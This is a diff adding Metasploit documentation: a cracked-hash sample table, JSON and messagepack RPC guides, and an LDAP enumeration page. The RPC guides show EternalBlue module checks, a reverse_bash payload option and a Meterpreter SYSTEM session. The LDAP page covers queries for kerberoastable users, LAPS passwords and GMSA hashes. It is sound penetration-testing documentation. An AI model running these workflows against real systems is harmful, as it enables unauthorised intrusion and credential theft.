+| MySQL                                | mysql_probe        | `445ff82636a7ba59`                                                                                                                                                                                                                                                     | probe        | mysql            | auxiliary/scanner/mysql/mysql_hashdump           | auxiliary/analyze/crack_databases                         |
+| MySQL SHA1                           | mysql-sha1_tere    | `*5AD8F88516BD021DD43F171E2C785C69F8E54ADB`                                                                                                                                                                                                                            | tere         | mysql-sha1       | auxiliary/scanner/mysql/mysql_hashdump           | auxiliary/analyze/crack_databases                         |
+| Oracle                               | simon              | `4F8BC1809CB2AF77`                                                                                                                                                                                                                                                     | A            | des,oracle       | auxiliary/scanner/oracle/oracle_hashdump         | auxiliary/analyze/crack_databases                         |
+| Oracle                               | SYSTEM             | `9EEDFA0AD26C6D52`                                                                                                                                                                                                                                                     | THALES       | des,oracle       | auxiliary/scanner/oracle/oracle_hashdump         | auxiliary/analyze/crack_databases                         |
+| Oracle 11                            | DEMO               | `S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C` | epsilon      | raw-sha1,oracle  | auxiliary/scanner/oracle/oracle_hashdump         | auxiliary/analyze/crack_databases                         |
+| Oracle 11                            | oracle11_epsilon   | `S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C` | epsilon      | raw-sha1,oracle  | modules/auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases                         |
+| Oracle 12                            | oracle12_epsilon   | `H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B`                                                                | epsilon      | pbkdf2,oracle12c | auxiliary/scanner/oracle/oracle_hashdump         | auxiliary/analyze/crack_databases                         |
+| Postgres                             | example            | `md5be86a79bf2043622d58d5453c47d4860`                                                                                                                                                                                                                                  | password     | raw-md5,postgres | auxiliary/scanner/postgres/postgres_hashdump     | auxiliary/analyze/crack_databases                         |
+| HMAC-MD5                             | hmac_password      | `<3263520797@127.0.0.1>#3f089332842764e71f8400ede97a84c9`                                                                                                                                                                                                              | password     | hmac-md5         | auxiliary/server/capture/smtp                    | None                                                      |
+| SHA512($p.$s)/dynamic_82/vmware ldap | vmware_ldap        | `$dynamic_82$a702505b8a67b45065a6a7ff81ec6685f08d06568e478e1a7695484a934b19a28b94f58595d4de68b27771362bc2b52444a0ed03e980e11ad5e5ffa6daa9e7e1$HEX$171ada255464a439569352c60258e7c6`                                                                                    | TestPass123# | dynamic_82       |                                                  | None                                                      |  |  |

 # Adding a New Hash

@@ -28,7 +28,7 @@ A listed `idea` is a seed for GSoC students to expand on and propose how to desi

 A place to get started with contributing to Metasploit is [here](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and expanded on [here](https://github.com/rapid7/metasploit-framework/wiki/Contributing-to-Metasploit#framework-bugs-and-features).

-GSoC mentors tend to look for those items that have a chance of making development and usage easier or improving the overall performance of a certain area, however by starting with understanding the most common contribution patten you can get familiar with the codebase and also the mindset of users. This will help you in creating a proposal with the end user in mind.
+GSoC mentors tend to look for those items that have a chance of making development and usage easier or improving the overall performance of a certain area, however by starting with understanding the most common contribution pattern you can get familiar with the codebase and also the mindset of users. This will help you in creating a proposal with the end user in mind.

 Once you have started digging feel free ask questions that help you understand the concepts you for the idea would like to propose.

@@ -0,0 +1,511 @@
+The RPC API enables you to programmatically drive the Metasploit Framework and commercial products using HTTP-based remote procedure call (RPC) services. An RPC service is a collection of message types and remote methods that provide a structured way for external applications to interact with web applications. You can use the RPC interface to locally or remotely execute Metasploit commands to perform basic tasks like running modules, communicating with the database, interacting with sessions, exporting data, and generating reports.
+
+The Metasploit products are written primarily in Ruby, which is the easiest way to use the remote API. However, in addition to Ruby, any language with support for HTTPS and MessagePack, such as Python, Java, and C, can be used to take advantage of the RPC API.
+
+There are currently two implementations of Metasploit's RPC:
+
+- HTTP and messagepack - covered by a separate guide
+- HTTP and JSON - covered by this guide
+
+Note that both the messagepack and JSON RPC services provide very similar operations, and it is worth reviewing both documents.
+
+## Starting the JSON API Server
+
+The pre-requisite to running the JSON API Server is to run your Metasploit database. This can be initialized with `msfdb`.
+Note that `msfdb` will ask if you wish to run the JSON RPC web service - but it is not required for this guide which
+shows how to run the JSON service directly with [thin](https://github.com/macournoyer/thin) or [Puma](https://github.com/puma/puma): 
+
+First run the Metasploit database:
+
+```
+msfdb init
+```
+
+After configuring the database the JSON RPC service can be initialized with the [thin](https://github.com/macournoyer/thin) Ruby web server:
+
+```
+bundle exec thin --rackup msf-json-rpc.ru --address 0.0.0.0 --port 8081 --environment production --tag msf-json-rpc start
+```
+
+Or with [Puma](https://github.com/puma/puma):
+
+```
+bundle exec puma msf-json-rpc.ru --port 8081 --environment production --tag msf-json-rpc start
+```
+
+### Development
+
+If you are wanting to develop or debug the Ruby implementation of the JSON RPC service - it can be useful to run the Metasploit API synchronously in the foreground.
+This allows for console logs to appear directly in the terminal, as well as being able to interact with breakpoints via `require 'pry-byebug'; binding.pry`:
+
+It is possible to debug Msfconsole's webservice component too:
+
+```
+bundle exec ruby ./msfdb reinit
+bundle exec ruby ./msfdb --component webservice stop
+bundle exec ruby ./msfdb --component webservice --no-daemon start
+```
+
+### RPC Logging
+
+You can configure the RPC service logging with the `MSF_WS_DATA_SERVICE_LOGGER` environment variable. 
+
+The list of supported loggers is viewable with `msfconsole --help`. The list at the time of writing is:
+
+- Stdout / Stderr / StdoutWithoutTimestamps - Write logs to stdout/stderr
+- Flatfile / TimestampColorlessFlatfile  - Write logs to `~/.msf4/logs`
+
+Example usage:
+
+```
+$ MSF_WS_DATA_SERVICE_LOGGER=Stdout bundle exec thin --rackup msf-json-rpc.ru --address localhost --port 8081 --environment production --tag msf-json-rpc start
+[11/25/2020 17:34:53] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
+[11/25/2020 17:34:53] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
+[11/25/2020 17:34:53] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
+[11/25/2020 17:34:53] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
+[11/25/2020 17:34:54] [e(0)] core: Unable to load module /Users/adfoster/Documents/code/metasploit-framework/modules/auxiliary/gather/office365userenum.py - LoadError  Try running file manually to check for errors or dependency issues.
+Thin web server (v1.7.2 codename Bachmanity)
+Maximum connections set to 1024
+Listening on localhost:8081, CTRL+C to stop
+[11/25/2020 17:35:17] [d(0)] core: Already established connection to postgresql, so reusing active connection.
+[11/25/2020 17:35:17] [e(0)] core: DB.connect threw an exception - ActiveRecord::AdapterNotSpecified database configuration does not specify adapter
+[11/25/2020 17:35:17] [e(0)] core: Failed to connect to the database: database configuration does not specify adapter```
+```
+
+## Concepts
+
+The Metasploit RPC aims to follow the [jsonrpc specification](https://www.jsonrpc.org/specification). Therefore:
+
+- Each JSON RPC request should provide a unique message ID which the client and server can use to correlate requests and responses
+- Metasploit may return the following [error codes](https://github.com/rapid7/metasploit-framework/blob/87b1f3b602753e39226a475a5d737fb50200957d/lib/msf/core/rpc/json/error.rb#L3-L13).
+
+## Examples 
+
+First ensure you are running the Metasploit database, and are running the JSON service before running these examples
+
+### Querying
+
+#### Query DB status
+
+Request:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Content-Type: application/json' \
+  --data '{
+        "jsonrpc": "2.0",
+        "method": "db.status",
+        "id": 1,
+        "params": []
+}'
+```
+
+Response:
+
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "driver": "postgresql",
+    "db": "msf"
+  },
+  "id": 1
+}
+```
+
+#### Query workspaces
+
+Request:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Content-Type: application/json' \
+  --data '{
+        "jsonrpc": "2.0",
+        "method": "db.workspaces",
+        "id": 1,
+        "params": []
+}'
+```
+
+Response:
+
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "workspaces": [
+      {
+        "id": 1,
+        "name": "default",
+        "created_at": 1673368954,
+        "updated_at": 1673368954
+      }
+    ]
+  },
+  "id": 1
+}
+```
+
+### Modules workflow
+
+#### Search for modules
+
+Request:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'content-type: application/json' \
+  --data '{ "jsonrpc": "2.0", "method": "module.search", "id": 1, "params": ["psexec author:egypt arch:x64"] }'
+```
+
+Response:
+
+```json
+{
+    "jsonrpc": "2.0",
+    "result": [
+        {
+            "type": "exploit",
+            "name": "PsExec via Current User Token",
+            "fullname": "exploit/windows/local/current_user_psexec",
+            "rank": "excellent",
+            "disclosuredate": "1999-01-01"
+        }
+    ],
+    "id": 1
+}
+```
+
+#### Run module check methods
+
+Metasploit modules support running `check` methods which can be used to identify the success of an exploit module, or to run an
+auxiliary module against a target. For instance, with an Auxiliary module check request:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Content-Type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "module.check",
+    "id": 1,
+    "params": [
+        "auxiliary",
+        "auxiliary/scanner/ssl/openssl_heartbleed",
+        {
+            "RHOST": "192.168.123.13"
+        }
+    ]
+}'
+```
+
+Or an Exploit module check request:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'content-type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "module.check",
+    "id": 1,
+    "params": [
+        "exploit",
+        "exploit/windows/smb/ms17_010_eternalblue",
+        {
+          "RHOST": "192.168.123.13"
+        }
+    ]
+}'
+```
+
+The response will contain an identifier which can be used to query for updates:
+
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "job_id": 0,
+    "uuid": "1MIqJ5lViZHSOuaWf1Zz1lpR"
+  },
+  "id": 1
+}
+```
+
+#### query all running stats
+
+Request:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Content-Type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "module.running_stats",
+    "id": 1,
+    "params": []
+}'
+```
+
+The response will include the following keys:
+- waiting - modules that are queued up, but have not started to run yet
+- running - currently running modules
+- results - the module has completed or failed, and the results can be retrieved and acknowledged 
+
+Response:
+
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "waiting": [
+      "NkJvf4kp4JxcuFCz7rjSuHL1",
+      "wRnMQuJ8gzMTp5CaHu18bHdV"      
+    ],
+    "running": [
+      "b7hIX6G4ZtwvRVRDOXk5ylSx",
+      "gx9xTEi6KlH5LJHauyhrHTBn",
+    ],
+    "results": [
+      "1MIqJ5lViZHSOuaWf1Zz1lpR",
+      "IN5PwYXrjqKfuekQt8cyCENK",
+      "Spd1xfgsCZXQABNh7UA3uB58",
+      "nRQw0bEvhFcXF0AxtVYOpQku"
+    ]
+  },
+  "id": 1
+}
+```
+
+#### retrieve module results
+
+It is possible to poll for module results using the id returned when running a module.
+
+Request:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Content-Type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "module.results",
+    "id": 1,
+    "params": ["0L37lfcIQqyRK9aBTIVJB4H3"]
+}'
+```
+
+Example response when the module is has not yet complete:
+
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "status": "running"  
+  },
+  "id": 1
+}
+```
+
+Example error response:
+
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "status": "errored",
+    "error": "The connection with (192.168.123.13:443) timed out."
+  },
+  "id": 1
+}
+```
+
+Example success response:
+
+```json
+{
+    "jsonrpc": "2.0",
+    "result": {
+        "status": "completed",
+        "result": {
+            "code": "vulnerable",
+            "message": "The target is vulnerable.",
+            "reason": null,
+            "details": {
+                "os": "Windows 7 Enterprise 7601 Service Pack 1",
+                "arch": "x64"
+            }
+        }
+    },
+    "id": 1
+}
+```
+
+#### acknowledge module results
+
+This command will also allow Metasploit to remove the result resources from memory. Not acknowledging module results will lead to a memory leak,
+but the memory is limited to 35mb as the memory datastore used is implemented by [`ActiveSupport::Cache::MemoryStore`](https://github.com/rapid7/metasploit-framework/pull/13036/files#diff-6e31832215e40b17a184a7f7b82d2aabfbaa8d98fabb3c43033dd8579ad3caaeR102) 
+
+Request:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Content-Type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "module.ack",
+    "id": 1,
+    "params": ["nRQw0bEvhFcXF0AxtVYOpQku"]
+}'
+```
+
+Response:
+
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "success": true
+  },
+  "id": 1
+}
+```
+
+### Analyzing hosts workflow
+
+Metasploit supports an `analyze` command which suggests modules to run based on what a user has already learned and stored about a host.
+First report a host:
+
+```bash
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Authorization: Bearer ' \
+  --header 'Content-Type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "db.report_host",
+    "id": 1,
+    "params": [
+        {
+            "workspace": "default",
+            "host": "10.0.0.1",
+            "state": "alive",
+            "os_name": "Windows",
+            "os_flavor": "Enterprize",
+            "os_sp": "SP2",
+            "os_lang": "English",
+            "arch": "ARCH_X86",
+            "mac": "97-42-51-F2-A7-A7",
+            "scope": "eth2",
+            "virtual_host": "VMWare"
+        }    
+    ]
+}'
+
+# response: {"jsonrpc":"2.0","result":{"result":"success"},"id":1}
+```
+
+Report the host vulnerabilities:
+
+```bash
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Authorization: Bearer ' \
+  --header 'Content-Type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "db.report_vuln",
+    "id": 1,
+    "params": [
+        {
+            "workspace": "default",
+            "host": "10.0.0.1",
+            "name": "Exploit Name",
+            "info": "Human readable description of the vuln",
+            "refs": [
+                "CVE-2017-0143",
+                "CVE-2017-0144",
+                "CVE-2017-0145",
+                "CVE-2017-0146",
+                "CVE-2017-0147",
+                "CVE-2017-0148"
+            ]
+        }
+    ]
+}'
+
+# response: {"jsonrpc":"2.0","result":{"result":"success"},"id":1}
+```
+
+Run the analyze command:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Authorization: Bearer ' \
+  --header 'Content-Type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "db.analyze_host",
+    "id": 1,
+    "params": [
+        {
+            "workspace": "default",
+            "host": "10.0.0.1"
+        }
+    ]
+}'
+```
+
+Response:
+
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "host": {
+      "address": "10.0.0.1",
+      "modules": [
+        {
+          "mtype": "exploit",
+          "mname": "exploit/windows/smb/ms17_010_eternalblue",
+          "state": "READY_FOR_TEST",
+          "description": "ready for testing",
+          "options": {
+            "invalid": [],
+            "missing": []
+          }
+        }
+      ]
+    }
+  },
+  "id": 1
+}
+```
+
+When analyzing a host, it is also possible to specify payload requirements for additional granularity:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Authorization: Bearer ' \
+  --header 'Content-Type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "db.analyze_host",
+    "id": 1,
+    "params": [
+        {
+            "workspace": "default",
+            "host": "10.0.0.1",
+            "payload": "payload/cmd/unix/reverse_bash"
+        }
+    ]
+}'
+```
@@ -0,0 +1,201 @@
+The RPC API enables you to programmatically drive the Metasploit Framework and commercial products using HTTP-based remote procedure call (RPC) services. An RPC service is a collection of message types and remote methods that provide a structured way for external applications to interact with web applications. You can use the RPC interface to locally or remotely execute Metasploit commands to perform basic tasks like running modules, communicating with the database, interacting with sessions, exporting data, and generating reports.
+
+The Metasploit products are written primarily in Ruby, which is the easiest way to use the remote API. However, in addition to Ruby, any language with support for HTTPS and MessagePack, such as Python, Java, and C, can be used to take advantage of the RPC API.
+
+There are currently two implementations of Metasploit's RPC:
+
+- HTTP and messagepack - covered by this guide
+- HTTP and JSON - covered by a separate guide
+
+Note that both the messagepack and JSON RPC services provide very similar operations, and it is worth reviewing both documents.
+
+## Starting the messagepack RPC Server
+
+Before you can use the RPC interface, you must start the RPC server. There are a couple of ways that you can start the server depending on the Metasploit product you are using. For this example we will use the MSFRPD Login Utility, but other methods can be found [here](https://docs.rapid7.com/metasploit/rpc-api).
+
+Use the follow command setting a username and password, current example uses `user` and `pass` retrospectively:
+
+```
+$ ruby msfrpcd -U <username> -P <pass> -f
+```
+
+## Connecting with the MSFRPC Login Utility
+
+The msfrpc login utility enables you to connect to the RPC server through msfrpcd. If you started the server using the msfrpcd tool, `cd`  into your framework directory, if you're a Framework user, or the `metasploit/apps/pro/msf3` directory if you are a Pro user, and run the following command to connect to the server:
+
+```
+$ ruby msfrpc -U <username> -P <pass> -a <ip address>
+```
+You can provide the following options:
+
+- `-P <opt>` - The password to access msfrpcd.
+- `-S` - Enables or disables SSL on the RPC socket. Set this value to true or false. SSL is on by default.
+- `-U <opt>` - The username to access msfrpcd.
+- `-a <opt>` - The address msfrpcd runs on.
+- `-p <opt>` - The port the msfrpc listens on. The default port is 55553.
+
+For example, if you want to connect to the local server, you can enter the following command:
+```
+$ ruby msfrpc -U user -P pass123 -a 127.0.0.1
+```
+
+Which returns the following response:
+
+```
+[*] exec: ruby msfrpc -U user -P pass123 -a 127.0.0.1
+
+[*] The 'rpc' object holds the RPC client interface
+[*] Use rpc.call('group.command') to make RPC calls
+```
+
+## RPC Workflow examples
+
+### Start the server
+
+Use the following command to run the server with a configured uesrname and password:
+
+```
+$ ruby msfrpcd -U user -P pass -f
+```
+
+### Start the client in second terminal tab
+
+Use the username and password set in the previous command to access the client:
+
+```
+# Start the client in second terminal tab
+$ ruby msfrpc -U user -P pass -a 0.0.0.0
+```
+
+An interactive prompt will open:
+
+```
+[*] The 'rpc' object holds the RPC client interface
+[*] Use rpc.call('group.command') to make RPC calls
+```
+
+### Commands
+
+Before looking at commands, we will list the options that can be pass into RPC calls:
+```
+--rpc-host HOST
+--rpc-port PORT
+--rpc-ssl <true|false>
+--rpc-uri URI
+--rpc-user USERNAME
+--rpc-pass PASSWORD
+--rpc-token TOKEN
+--rpc-config CONFIG-FILE
+--rpc-help
+```
+
+#### Auxiliary module example
+
+To execute the `scanner/smb/smb_enumshares` module:
+
+```
+>> rpc.call("module.execute", "auxiliary", "scanner/smb/smb_enumshares", {"RHOSTS" => "192.168.175.135", "SMBUSER" => "Administrator", "SMBPASS" => "Password1"})
+=> {"job_id"=>0, "uuid"=>"yJWES2Y6d4MRyfFLWjqhqvon"}
+```
+
+Note that the result returns the `job_id` and `uuid` - which can be used for tracking the module's progress.
+
+The arguments supplied are:
+
+- `"module.execute"` - The method you want to call against the module
+- `"auxiliary"` - the module type
+- `"scanner/smb/smb_enumshares"` - The specific module you want to run
+- `{"RHOSTS" => "192.168.175.135", "SMBUSER" => "Administrator", "SMBPASS" => "Password1"}` - The module's datastore options
+
+Query all running stats with:
+
+```
+>> rpc.call('module.running_stats')
+=> {"waiting"=>[], "running"=>[], "results"=>["yJWES2Y6d4MRyfFLWjqhqvon"]}
+```
+
+Note that the output contains the previous `uuid`, which has now been marked as completed.
+To view the module results for a given `UUID`:
+
+```
+>> rpc.call('module.results', 'yJWES2Y6d4MRyfFLWjqhqvon')
+=> {"status"=>"completed", "result"=>nil}
+```
+
+#### Listing current jobs/sessions
+
+To list the current jobs:
+
+```
+>> rpc.call('job.list')
+=> {"0"=>"Exploit: windows/smb/ms17_010_psexec"}
+```
+
+To list the current sessions:
+
+```
+>> rpc.call('session.list')
+=>
+{1=>
+  {"type"=>"meterpreter",
+   "tunnel_local"=>"192.168.8.125:4444",
+   "tunnel_peer"=>"192.168.8.125:63504",
+   "via_exploit"=>"exploit/windows/smb/psexec",
+   "via_payload"=>"payload/windows/meterpreter/reverse_tcp",
+   "desc"=>"Meterpreter",
+   "info"=>"NT AUTHORITY\\SYSTEM @ DC1",
+   "workspace"=>"false",
+   "session_host"=>"192.168.175.135",
+   "session_port"=>445,
+   "target_host"=>"192.168.175.135",
+   "username"=>"cgranleese",
+   "uuid"=>"hqtjjwgx",
+   "exploit_uuid"=>"hldyog8j",
+   "routes"=>"",
+   "arch"=>"x86",
+   "platform"=>"windows"}}
+```
+
+#### Killing sessions
+
+To stop an active session use the `session.stop` command and pass the session ID. To find the session ID you can use the `session.list` command. 
+
+```
+rpc.call('session.stop', 1)
+```
+
+### Example workflows
+
+Let's look at a some workflows using the commands we discussed above for a complete workflow.
+
+#### Auxiliary module workflow
+
+```
+[*] The 'rpc' object holds the RPC client interface 
+[*] Use rpc.call('group.command') to make RPC calls
+
+>> rpc.call("module.execute", "auxiliary", "scanner/smb/smb_enumshares", {"RHOSTS" => "xxx.xxx.xxx.xxx", "SMBUSER" => "user", "SMBPASS" => "password"})
+=> {"job_id"=>0, "uuid"=>"yJWES2Y6d4MRyfFLWjqhqvon"}
+>> rpc.call('module.running_stats')
+=> {"waiting"=>[], "running"=>[], "results"=>["yJWES2Y6d4MRyfFLWjqhqvon"]}
+>> rpc.call('module.results', 'yJWES2Y6d4MRyfFLWjqhqvon')
+=> {"status"=>"completed", "result"=>nil}
+```
+
+#### Exploit module workflow
+
+This workflow makes use of the `module.check` method to check if the target is vulnerable to the module's exploit:
+
+```
+[*] The 'rpc' object holds the RPC client interface 
+[*] Use rpc.call('group.command') to make RPC calls 
+
+>> rpc.call("module.check", "exploit", "windows/smb/ms17_010_psexec", {"RHOSTS" => xxx.xxx.xxx.xxx", "SMBUSER" => "user", "SMBPASS" => "password"}) 
+=> {"job_id"=>0, "uuid"=>"q3eewYtM3LqxuVN5ai1Wya3i"} 
+>> rpc.call('module.running_stats') 
+=> {"waiting"=>[], "running"=>[], "results"=>["q3eewYtM3LqxuVN5ai1Wya3i"]} 
+>> rpc.call('module.results', 'q3eewYtM3LqxuVN5ai1Wya3i') 
+=> {"status"=>"completed", "result"=>{"code"=>"vulnerable", "message"=>"The target is vulnerable.", "reason"=>nil, "details"=>{"os"=>"Windows 8.1 9600", "arch"=>"x64"}}}
+```
+
+The `module.result` calls shows that the target is vulnerable, and additional metadata about the target has been returned.
@@ -25,14 +25,14 @@ The current data storage mechanism couples the metasploit core framework code to
 * The ability to support/use different data storage technologies is difficult
 * Promotes a monolithic architecture where poor performance in any segment of the software affects the entire system (large network scans)

-Our solution to this is a data service proxy.  A data service proxy allows us to separate core metasploit framework code from the underlying data service technology.  The `framework.db` reference to data services is no longer tied directly to the underlying data storage, but instead all calls are proxied to an underlying implementation.
+Our solution to this is a data service proxy.  A data service proxy allows us to separate core Metasploit Framework code from the underlying data service technology.  The `framework.db` reference to data services is no longer tied directly to the underlying data storage, but instead all calls are proxied to an underlying implementation.

 Currently we plan to support the legacy data storage technology stack (RAILS/PostgreSQL) which we hope to eventually phase out.  The new implementation will use a RESTful (https://en.wikipedia.org/wiki/Representational_state_transfer) approach whereby calls to `framework.db` can be proxied to a remote web service that supports the same data service API.  We have built a web service that runs atop the current data storage service for the community.

 This approach enables us to:
-* More easily enhance the metasploit data model 
-* Run a web-based data service independent of the metasploit framework
-    * Reduces the memory used by a metasploit framework instance using a data service by no longer requiring a DB client
+* More easily enhance the metasploit data model
+* Run a web-based data service independent of the Metasploit Framework
+    * Reduces the memory used by a Metasploit Framework instance using a data service by no longer requiring a DB client
    *  Increases throughput as storage calls don't necessarily need to be asynchronous
    *  Allow teams to collaborate easily by connecting to a centralized data service
 * Quickly build out data services that leverage different technology stacks
@@ -0,0 +1,125 @@
+## LDAP Workflows
+
+Lightweight Directory Access Protocol (LDAP) is a method for obtaining distributed directory information from a service.
+For Windows Active Directory environments this is a useful method of enumerating users, computers, misconfigurations, etc. 
+
+LDAP on Windows environments are found on:
+
+- 389/TCP - LDAP
+- 636/TCP - LDAPS
+- 3268 - Global Catalog LDAP
+- 3269 - Global Catalog LDAPS
+
+### Lab Environment
+
+LDAP support is enabled by default on a Windows environment when you install Active Directory.
+For LDAPS support to be enabled on port 636, you will have to configure [[AD CS (Active Directory Certificate Services)|ad-certificates/overview.md]]
+
+### Authentication
+
+The LDAP module supports the following forms of authentication with the `LDAP::Auth` option:
+
+- auto
+- ntlm
+- kerberos - Example below
+- plaintext
+- none
+
+### LDAP Enumeration
+
+The `auxiliary/gather/ldap_query.rb` module can be used for querying LDAP:
+
+```
+use auxiliary/gather/ldap_query
+run rhost=192.168.123.13 username=Administrator@domain.local password=p4$$w0rd action=ENUM_ACCOUNTS
+```
+
+Example output:
+
+```
+msf6 auxiliary(gather/ldap_query) > run rhost=192.168.123.13 username=Administrator@domain.local password=p4$$w0rd action=ENUM_ACCOUNTS
+[*] Running module against 192.168.123.13
+
+[*] Discovering base DN automatically
+[+] 192.168.123.13:389 Discovered base DN: DC=domain,DC=local
+CN=Administrator CN=Users DC=domain DC=local
+==========================================
+
+ Name                Attributes
+ ----                ----------
+ badpwdcount         0
+ description         Built-in account for administering the computer/domain
+ lastlogoff          1601-01-01 00:00:00 UTC
+ lastlogon           2023-01-23 11:02:49 UTC
+ logoncount          159
+ memberof            CN=Group Policy Creator Owners,CN=Users,DC=domain,DC=local || CN=Domain Admins,CN=Users,DC=domain,DC=local |
+                     | CN=Enterprise Admins,CN=Users,DC=domain,DC=local || CN=Schema Admins,CN=Users,DC=domain,DC=local || CN=Adm
+                     inistrators,CN=Builtin,DC=domain,DC=local
+ name                Administrator
+ pwdlastset          133189448681297271
+ samaccountname      Administrator
+ useraccountcontrol  512
+
+ ... etc ...
+```
+
+This module has a selection of inbuilt queries which can be configured via the `action` setting to make enumeration easier:
+
+- `ENUM_ACCOUNTS` - Dump info about all known user accounts in the domain.
+- `ENUM_ADCS_CAS` - Enumerate ADCS certificate authorities.
+- `ENUM_ADCS_CERT_TEMPLATES` - Enumerate ADCS certificate templates.
+- `ENUM_ADMIN_OBJECTS` - Dump info about all objects with protected ACLs (i.e highly privileged objects).
+- `ENUM_ALL_OBJECT_CATEGORY` - Dump all objects containing any objectCategory field.
+- `ENUM_ALL_OBJECT_CLASS` - Dump all objects containing any objectClass field.
+- `ENUM_COMPUTERS` - Dump all objects containing an objectCategory or objectClass of Computer.
+- `ENUM_CONSTRAINED_DELEGATION` - Dump info about all known objects that allow contrained delegation.
+- `ENUM_DNS_RECORDS` - Dump info about DNS records the server knows about using the dnsNode object class.
+- `ENUM_DNS_ZONES` - Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This isneeded - as without this BASEDN prefix we often miss certain entries.
+- `ENUM_DOMAIN_CONTROLLERS` - Dump all known domain controllers.
+- `ENUM_EXCHANGE_RECIPIENTS` - Dump info about all known Exchange recipients.
+- `ENUM_EXCHANGE_SERVERS` - Dump info about all known Exchange servers.
+- `ENUM_GMSA_HASHES` - Dump info about GMSAs and their password hashes if available.
+- `ENUM_GROUPS` - Dump info about all known groups in the LDAP environment.
+- `ENUM_GROUP_POLICY_OBJECTS` - Dump info about all known Group Policy Objects (GPOs) in the LDAP environment.
+- `ENUM_HOSTNAMES` - Dump info about all known hostnames in the LDAP environment.
+- `ENUM_LAPS_PASSWORDS` - Dump info about computers that have LAPS enabled, and passwords for them if available.
+- `ENUM_LDAP_SERVER_METADATA` - Dump metadata about the setup of the domain.
+- `ENUM_ORGROLES` - Dump info about all known organization roles in the LDAP environment.
+- `ENUM_ORGUNITS` - Dump info about all known organizational units in the LDAP environment.
+- `ENUM_UNCONSTRAINED_DELEGATION` - Dump info about all known objects that allow uncontrained delegation.
+- `ENUM_USER_ACCOUNT_DISABLED` - Dump info about disabled user accounts.
+- `ENUM_USER_ACCOUNT_LOCKED_OUT` - Dump info about locked out user accounts.
+- `ENUM_USER_ASREP_ROASTABLE` - Dump info about all users who are configured not to require kerberos pre-authentication and are therefore AS-REP roastable.
+- `ENUM_USER_PASSWORD_NEVER_EXPIRES` - Dump info about all users whose password never expires.
+- `ENUM_USER_PASSWORD_NOT_REQUIRED` - Dump info about all users whose password never expires and whose account is still enabled.
+- `ENUM_USER_SPNS_KERBEROAST` - Dump info about all user objects with Service Principal Names (SPNs) for kerberoasting.
+
+### Kerberos Authentication
+
+Details on the Kerberos specific option names are documented in [[Kerberos Service Authentication|kerberos/service_authentication]]
+
+Query LDAP for accounts:
+
+```
+msf6 > use auxiliary/gather/ldap_query
+msf6 auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13
+[*] Running module against 192.168.123.13
+
+[+] 192.168.123.13:88 - Received a valid TGT-Response
+[*] 192.168.123.13:389 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_216797.bin
+[+] 192.168.123.13:88 - Received a valid TGS-Response
